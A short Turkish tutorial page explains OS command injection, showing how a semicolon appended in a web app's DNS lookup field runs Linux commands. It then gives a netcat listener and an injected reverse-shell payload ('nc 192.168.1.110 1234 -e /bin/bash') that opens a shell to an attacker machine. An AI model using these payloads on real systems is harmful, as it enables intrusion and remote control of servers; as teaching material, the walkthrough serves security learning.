OS Command Açığı ve İstismarı

Arkadaşlar merhaba, bu konuda sizlere OS Command Güvenlik açığından ve istismarından bahsedicem. Web uygulamasındaki girdi alanı üzerinden sistem komutlarının çalıştırılmasıyla ortaya çıkan güvenlik açığıdır. Bu açığın bulunduğu web uygulaması linux üzerinde çalışıyorsa linux komutları, windows üzerinde çalışıyorsa windows komutları kullanılır.

ilgili web sayfasına gidiyoruz,
DNS Lookup için ayrılmış bu bölümde site adresinde sonra ; özel karakterini ekleyip ardından linux komutu yazıyoruz.
pwd komutunun çalıştığığını görüyoruz ve o an içinde bulunduğumuz dizini tespit etmiş oluyoruz.

OS Command’la Sisteme Sızma

Bize ait kali makinesinde netcat aracı ile 1234 portunu dinlemeye başlıyoruz. (nc -lvp 1234)

1234 portu dinlemede

OS Command Güvenlik Açığının olduğu alanda netcat ile /bin/bash uygulamasını 192.168.1.110(kali) ip adresine sahip makinede 1234 port üzerinden ulaşılmasına izin veriyoruz. (www.nsa.gov;nc 192.168.1.110 1234 -e /bin/bash)

/bin/bash uygulamasına izin veriliyor
istismar gerçekleşti ve bağlantı kuruldu

 

0 0 vote
Eğitimi Derecelendir
0 Yorum
Inline Feedbacks
View all comments
0
Lütfen bu eğitimle ilgili yorumunuzu bırakınx
()
x